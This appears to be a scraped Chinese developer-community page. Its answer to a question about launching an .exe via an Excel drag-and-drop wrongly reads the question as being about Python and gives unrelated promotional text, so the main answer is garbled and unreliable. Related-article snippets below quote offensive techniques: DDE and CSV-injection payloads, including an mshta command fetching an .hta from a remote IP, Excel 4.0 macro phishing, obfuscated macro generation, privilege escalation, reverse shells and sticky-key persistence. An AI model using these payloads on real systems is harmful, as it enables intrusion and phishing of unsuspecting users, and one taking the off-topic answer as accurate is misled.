首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

巨蟒。在cmd中触发.exe(作为excel文件的拖放操作)

巨蟒是一种指代Python编程语言的俚语,它源自于Python的英文名称"Python"与大蟒蛇(Python)之间的谐音关系。Python是一种高级、通用、解释型编程语言,具有简洁、易读、易学的特点,被广泛应用于前端开发、后端开发、数据科学、人工智能等领域。

Python的优势包括:

  1. 简洁易读:Python采用简洁的语法和清晰的代码结构,使得代码易于理解和维护。
  2. 大量的库和框架:Python拥有丰富的第三方库和框架,可以快速构建各种应用和系统。
  3. 跨平台性:Python可以在多个操作系统上运行,包括Windows、Linux和MacOS等。
  4. 强大的社区支持:Python拥有庞大的开发者社区,提供了丰富的文档、教程和解决方案。

在云计算领域,Python也被广泛应用于各个方面,例如:

  1. 云原生应用开发:Python可以用于开发云原生应用,如使用Django或Flask等框架构建Web应用程序。
  2. 自动化运维:Python可以编写脚本来自动化服务器运维任务,如自动化部署、监控和日志处理等。
  3. 数据处理和分析:Python的数据处理和分析库(如NumPy、Pandas和Matplotlib)可以在云平台上进行大规模数据处理和分析。
  4. 机器学习和人工智能:Python的机器学习和人工智能库(如TensorFlow和PyTorch)可以在云平台上进行模型训练和推理。

腾讯云提供了多个与Python相关的产品和服务,包括:

  1. 云服务器(CVM):提供了基于Linux和Windows的云服务器实例,可以在上面运行Python应用。
  2. 云函数(SCF):无服务器函数计算服务,可以使用Python编写函数逻辑。
  3. 云数据库MySQL版(CDB):提供了MySQL数据库服务,可以与Python应用程序进行集成。
  4. 人工智能平台(AI Lab):提供了基于Python的机器学习和深度学习开发环境。

更多关于腾讯云的产品和服务信息,请访问腾讯云官方网站:https://cloud.tencent.com/

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

钓鱼技术

文件验证失败 文件是使用“在受保护的视图中打开”选项打开的 文件是从其他人的 OneDrive 存储中打开的 XLM / Macro 4.0 (excel宏钓鱼) excel下有宏功能,可以用来执行命令...其使用方法如下 右键下方sheet1,选择插入 点击 MS Excel4.0宏表,就可在excel中插入一个宏表 依次输入这两个命令,并把第一行设置为Auto_Open 随后保存为xlsm文件即可。...随后当该文件被打开时,会自动打开cmd窗口 这里的exec其实是执行的cmd命令,我们可以借此来上线cs等操作。 真不错。但在某些情况下打开此类excel文件需手动点击启用宏才能正常钓鱼。...,实用性比宏好 DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" 随后在打开该文件时会出现两个对话框,全点是就会执行以上命令了 office...文件,写好卷标名,然后就把软件包插入到word界面了,只要用户点击该软件包并选择执行,则会执行我们在lnk中定义的代码 而且值得一提的是,如果用上述方法把lnk文件放入publisher文件,则在网络中打开该文件时不会触发受保护视图

3.2K30
  • DDE注入(CSV)漏洞原理及实战案例全汇总

    在渗透中遇到导出功能时,会如何进行测试?任意文件下载?或者越权查看?...实际上,除了=号,以下符号都可用于在Microsoft Excel中触发公式解释: 等于(“=”) 加(“+”) 减号(“ - ”) 在 (”@”) 这个可以帮助我们在等号=被过滤时,使用其他运算符绕过...比如我们构造包含如下字符串的csv或xls文件: =cmd | '/ C calc' !A0 Excel会尝试调用本机CMD命令,给出友好提示,若用户在无意识状态下点击“是”: ?...Excel将打开存储在link_location的文件,如: ?...界面导出数据处,导出csv文件并在Excel中查看: ? 若输入payload:=cmd|' /Ccalc'!A0再次执行,弹出计算器: ?

    10.1K20

    如何使用BoobSnail生成任意Excel 4.0 XLM宏文件

    关于BoobSnail BoobSnail可以帮助广大研究人员生成XLM(Excel 4.0)宏文件,该工具可以在XLM宏生成任务中给红队和蓝队研究人员提供帮助。...> --out boobsnail.csv 生成能够运行calc.exe的经过代码混淆处理的宏: python boobsnail.py Excel4ExecGenerator --cmd "powershell.exe...excel4lib库包含了几个类,可以在创建生成器的过程中使用: macro.Excel4Macro:允许定义Excel4公式和变量值; macro.obfuscator.Excel4Obfuscator...:允许对Excel4宏中的指令代码进行混淆处理; lang.Excel4Translator:允许将公式转译为其他语言; 下面给出的例子中将创建一个能够运行calc.exe的简单宏: from excel4lib.macro...("EXEC", cmd) # Dump to CSV print(macro.to_csv()) 结果如下 cmd="calc.exe"; =URUCHOM.PROGRAM(cmd); 如果你需要创建一个能将其他公式作为接收参数的公式

    70820

    干货 | Office文档钓鱼的实战和免杀技巧

    以cmd.exe来举例, 将其重命名为cmdgpj.exe,然后在 cmd 与 g 之间右键,看图操作 ok,此时已经变成了 以 jpg 结尾的了。但是双击运行还是 exe 格式运行的。...生成自解压文件, 图标有点不太对劲,使用 Restorator 把flash图标抠下来,在弄到生成的自解压文件。 具体操作就不写了,直接看结果。...可以将IYQ简单的理解成内置在excel中的一种特殊‘web浏览器’(不能加载脚本),通过IQY【即web查询】语句,可以直接将各类web上的列表数据轻松引入到当前的excel中,而正是因为这样,从而给了我们利用...当受害者双击打开时,默认会用Excel打开,弹出警告,点击启用 因为前面的iqy文件是用cmd执行的,所以会继续询问是否启动另一个应用程序,CMD.EXE....PPTX文件,随便填入一些内容,如下图: 这里要选择空白的那个,选择以后,在页面中拉出一个触发位置,之后会弹出动作设置的界面,选择鼠标悬停-→ 运行程序 msiexec.exe,系统进程,是Windows

    7.8K21

    CSV注入之RCE&社工钓鱼

    漏洞介绍 CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量,攻击这可以向Excel文件中注入可以输出或以CSV文件读取的恶意攻击载荷,当用户打开Excel文件时,文件会从CSV...描述转变为原始的Excel格式,包括Excel提供的所有动态功能,在这个过程中,CSV中的所有Excel公式都会执行,当该函数有合法意图时,很易被滥用并允许恶意代码执行。...漏洞复现 简易测试 在Office的"文件->选项->信任中心"处开启"启用动态数据交换服务器启动"功能: 之后构造以下恶意载荷: =1+cmd|' /C calc'!...中插入恶意载荷 =1+cmd|' /C mshta.exe http://192.168.174.129:8888/Agd7QT.hta'!...Excel,再次打开Excel时便会导致恶意载荷执行,同时CSV注入也可以用于钓鱼,攻击者可以精心构造一个富含大量数据的Excel并插入恶意代码,诱导受害者用户访问并查看,从而触发恶意代码~

    1.5K40

    VS Code(​终端)

    此操作将在下拉列表中创建另一个条目,可用于在它们之间进行切换。 增加N个新得终端 按下垃圾桶按钮删除终端实例。...未分配 调整窗格大小 组态 使用的外壳默认$SHELL在Linux和macOS上使用,在Windows 10上使用PowerShell,在Windows早期版本上使用cmd.exe。...中打开的文件夹的路径 $ {workspaceFolderBasename} -在VS Code中打开的文件夹名称,不带任何斜杠(/) $ {file} -当前打开的文件 $ {relativeFile.../your-project/folder/file.ext您的编辑器中打开的文件; 该目录/home/your-username/your-project将作为您的根工作空间打开。...新名称将显示在终端选择下拉列表中。 在特定文件夹中打开 默认情况下,终端将在资源管理器中打开的文件夹中打开。

    3.5K20

    当输入getsystem会发生什么?

    - Token Duplication (In Memory/Admin) ---- 让我们来了解一下原理: 技术 1 Meterpreter将创建一个命名管道,并且还创建并运行一个服务,该服务运行 cmd.exe...\pipe\[random pipe here] 生成的cmd.exe连接到Meterpreter的命名管道时,Meterpreter将有机会模拟该服务安全上下文(模仿客户端是一个命名管道功能),服务的上下文是...若要使用SYSTEM用户上下文创建客户端,此技术将DLL拖放到磁盘上,并将rundll32.exe安排为服务,以将DLL作为SYSTEM运行,然后将DLL连接到命名管道,获得SYSTEM权限。...感兴趣得可以看看elevate_via_service_namedpipe2在Meterpreter的源代码,研究一下这种技术。注意:该技术将文件拖放到磁盘上。这也是反病毒木马软件查杀的依据。...会获取SYSTEM令牌,在Meterpreter中打开主线程,然后尝试将SYSTEM令牌应用于该线程。

    38510

    再次发现黑客利用新冠疫情实施钓鱼邮件攻击

    黑客以供应商销售部的名义发出钓鱼邮件,附带了包含CVE-2017-11882漏洞利用的Excel文件,以运行从恶意网站下载的木马程序。...CertUtil.exe是Windows的内置程序,用于在Windows中管理证书,使用该程序可以在Windows中安装,备份,删除,管理和执行与证书和证书存储相关的各种功能。...第二阶段攻击载荷在启动加载模块的时候,会将木马程序的二进制内存数据作为参数传入。加载模块在执行过程中,首先会对当前系统环境中的AV产品和操作系统进行检查。...同时,还提供DOC和EXCEL exploit的定制服务。 WARZONE RAT因为木马文件中存在字符串AVE_MARIA,又被安全厂商识别为Ave Maria。...特权提升针对不同版本的操作系统使用不同的方法: 1.通过添加Windows Defender排除项提升权限 ?

    1.9K50

    当输入getsystem会发生什么?

    Admin) 让我们来了解一下原理: ················ 技术 1 ················ Meterpreter将创建一个命名管道,并且还创建并运行一个服务,该服务运行 cmd.exe...\pipe\[random pipe here] 生成的cmd.exe连接到Meterpreter的命名管道时,Meterpreter将有机会模拟该服务安全上下文(模仿客户端是一个命名管道功能),服务的上下文是...若要使用SYSTEM用户上下文创建客户端,此技术将DLL拖放到磁盘上,并将rundll32.exe安排为服务,以将DLL作为SYSTEM运行,然后将DLL连接到命名管道,获得SYSTEM权限。...感兴趣得可以看看elevate_via_service_namedpipe2在Meterpreter的源代码,研究一下这种技术。注意:该技术将文件拖放到磁盘上。这也是反病毒木马软件查杀的依据。...会获取SYSTEM令牌,在Meterpreter中打开主线程,然后尝试将SYSTEM令牌应用于该线程。

    1.1K30

    教你如何开发不可检测的C#、C++反向Shell

    在这篇文章中,我将跟大家分享如何利用C#和C++来开发反病毒产品无法检测到的反向Shell。 ? 简单的C#反向Shell GitHub上有很多能够通过cmd.exe打开反向Shell的C#代码样本。...在这篇文章中,我会从GitHub上借鉴部分代码,然后用到了下面这个C#程序中。这个程序不能绕过AV,没有混淆代码,它能做的只有“在目标设备上打开socket,启动cmd.exe”: ?...你可以看到,.exe文件通过了Windows Defender的检测,说明从AV的角度来看,它不会执行任何恶意操作,这也是正常的扫描结果。 ?...运行命令之后,PS将会下载上述的两份文件,然后存储在文件系统中。接下来,它们会使用Microsoft.Workflow.Compiler.exe来实时编译C#代码,并开启反向Shell。...这个Excel文件并不会被检测为恶意文件,而且能够在不触发任何警报的情况下打开反向Shell。 ? ? ? VirusTotal检测结果 ?

    2K30

    渗透测试与开发技巧

    位Windows系统下执行的时候,如果有对注册表和文件的操作,存在重定向 对注册表操作: 访问HKLM\Software\的实际路径为HKLM\Software\Wow6432Node\ 对文件操作:...快捷方式的参数隐藏技巧 将payload放置在260个空字符之后,这样无法在文件属性查看payload,可以用来在快捷方式中隐藏payload,欺骗用户点击,隐蔽执行代码 参考: 《渗透技巧——快捷方式文件的参数隐藏技巧...文件 利用文件hash的算法缺陷,向PE文件中隐藏Payload,同时不影响该PE文件的数字签名 参考: 《隐写技巧-在PE文件的数字证书中隐藏Payload》 方法3:特殊ADS (1)... type...persistence》 方法11:Office加载项 如果系统已安装office软件,可通过配置Office加载项实现劫持,作为被动后门 常用利用方式: Word WLL Excel XLL Excel...) 参考: 《渗透技巧——"隐藏"注册表的创建》 《渗透技巧——"隐藏"注册表的更多测试》 方法19:powershell配置文件 修改powershell配置文件,后门在powershell进程启动后触发

    4.6K20

    技术分享-持久性-WMI事件订阅

    notepad.exe 进程时执行 cmd.exe。...该文件将自动存储在 WMI 存储库中,并且恶意负载/命令将自动执行。 mofcomp.exe ....编译 MOF 文件后,立即生成了一个 Meterpreter 会话。 尽管一些 APT 的小组使用 MOF 文件作为 dropper 以实现 WMI 的持久性,但不建议将其作为一种方法。...默认情况下,此工具使用记事本,这是一个常见的 Windows 应用程序,但可以修改代码以针对任何其他常见进程,例如 word.exe、outlook.exe、excel.exe、calc.exe,具体取决于从主机收集的信息在态势感知期间...“ wmi_updater ” 模块能够从远程位置获取有效负载,而不是将其存储在 WMI 存储库中。它将注册为“ AutoUpdater ”,并且可以在启动时或一天中的特定时间设置触发器。

    2.8K10

    红队技巧-常规横向手法

    - 与目标机器已经建立ipc连接 利用 sc 命令 在windows系统命令提示符中,有一个SC工具命令集。该工具集主要用来对操作系统服务进行管理,该命令是由service一词,简化而来的。...然后让跳板机使用copy命令远程操作,将metasploit生成的payload文件Gamma.exe复制到目标主机DC系统C盘中。 3. 再在目标主机DC上创建一个名称为“backdoor”的服务。...sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:cmd.exe 2.WMI WMI是一项核心的Windows管理技术,WMI作为一种规范和基础结构...在客户端应用程序和服务器进程之间建立通信。在大多数情况下,新过程是在与DCOM通信关联的会话中创建的。 然后,客户端可以访问新创建的对象的成员和方法。...注意: 可以将“ Shell.Application”(已加载的shell32.dll中实现)对象替换为“ Wscript.Shell”. 7.Excel XLL (Excel进程加载恶意的DLL) XLL

    2.1K20

    皮肤引擎(HTMLayout)特性说明文档

    启动 bin\browse.exe, 然后用它打开 html_samples 目录下的文件查看.)...主界面的皮肤文件中没有使用此css文件. HTMLayout 的 Demo 文件包中 html_samples\form\ 目录下有大部分控件的范例文件....匹配被作为弹出菜单或面板显示的menu元素. button:owns-popup 匹配触发了弹出行为且弹出菜单或面板处于可见状态的 button 元素. div:drop-target 匹配在拖放操作中可以接受被拖放对象的...div元素. div:drag-over 匹配在拖放操作中鼠标所处的可接受被拖放对象的 div元素. li:moving 匹配正以移动模式被拖放的li元素. li:copying 匹配正以副本模式被拖放的...behavior: popup-menu; 打开弹出菜单.具有该行为的元素在点击后会打开子元素中的第一个 或元素作为菜单.

    33440

    windows CMD命令的一些使用方法及注意事项

    、数字问题 首先说不论是执行路径还是脚本参数均不能包含或使用这四类字符[中文、空格、特殊字符、数字] 执行路径还是变量是一定不可以以数字开头的,变量也不建议使用纯数字,例如: 在cmd窗口定义并执行:...// bb set VALUE3=%3% // cc 上面是定义了接收变量的,实际也可以不使用接收变量~ 2.在cmd执行命令行(裸命令)或脚本文件内 声明: set aa=hello 使用: echo...windows下可以实现zip相关功能的工具大概有这俩,这是我用到过的: 1.使用7z 这个工具十分好用,既可以GUI操作,也可以使用命令行操作,使用命令行则为: %---- 若 7z.exe 安装在这个地方...---% C:\Program Files\7-Zip\7z.exe %---- 则具体执行命令 ---% "C:\Program Files\7-Zip\7z" a 压缩后的文件.zip 文件夹或文件...具体使用如下: %----若 7z.exe 安装在这个地方 ---% D:\zips\zip.exe %---- 执行的命令 ---% D:\zips\zip -r 压缩后的文件.zip 文件夹或文件

    42410

    python 优化办公(excel)

    任务描述: 从图片的特定位置获取字符串 作为该图片的名字 根据图片名字 在excel中标记出来,未找到的记录下来,保存退出 特别说明:本文使用的文字识别是AipOcr,对应的ID,KEY,SECRECT...为你自己的,路径都是当前路径,操作excel用的是win32com 思路: 识别当前目录的图片文件 和 excel文件 把图片中需要识别的部分 切割下来,交给第三方识别,然后提取识别结果,并命名 把excel...system('pause') ---- 结果: 光有.PY文件怎么行,别人没有python啊,我们需要打包成.exe文件(注意:别被杀毒软件拦下来,以下操作在cmd框框执行,还得注意路径问题)...用pyinstaller生成.exe文件 安装pyinstaller : pip install pyinstaller 使用pyinstaller: pyinstaller -F 你的.py文件...-i 你的ico图标(logo) 生成的.exe文件在 dist目录,built目录已经没用了

    1.3K50

    ApacheTomca远程执行代码(CVE-2019-0232)漏洞浅析和复现

    通过调用CreateProcess()函数启动Windows操作系统中的新进程,该函数将以下命令行作为字符串(对CreateProcess的lpComandLine参数):int CreateProcess...ProcessImpl()构建Cmdline并将其传递给CreateProcess() Windows函数,之后CreateProcess() 在cmd.exe shell环境中执行.bat和.cmd...如果要运行的文件包含.bat或.cmd扩展名,则要运行的映像将变为cmd.exe,即Windows命令提示符。...然后CreateProcess()在阶段1重新启动,批处理文件的名称作为cmd.exe的第一个参数传递。...转换,例如由&,||,&&运算符触发的转换,将命令行拆分为几个部分。所有cmd的转换都由以下元字符之一触发:(,),%,!,^,“,,&和|。

    2.7K10

    windows中常见后门持久化方法总结

    粘滞键,启动快捷键:按五次shift键 C:\Windows\System32\utilman.exe 设置中心,启动快捷键:Windows+U键 在低版本的windows中,我们可以直接把setch.exe...替换成我们的后门程序,下面我们把setch.exe替换为cmd.exe ?...映像劫持 这个和shift后门差不多,只不过在低版本的windows中,我们可以简单地替换程序,但是在高版本的windows版本中替换的文件受到了系统的保护,所以这里我们要使用另外一个知识点:映像劫持。...其中explorer.exe会调用shell32.dll,然后会加载COM对象MruPidlList,从而触发我们的dll文件 ?...c:\Users\qiyou\Desktop\calc.exe //为了方便起见我们直接复制本地文件 bitsadmin /SetNotifyCmdLine test cmd.exe "cmd.exe

    2.1K20
    领券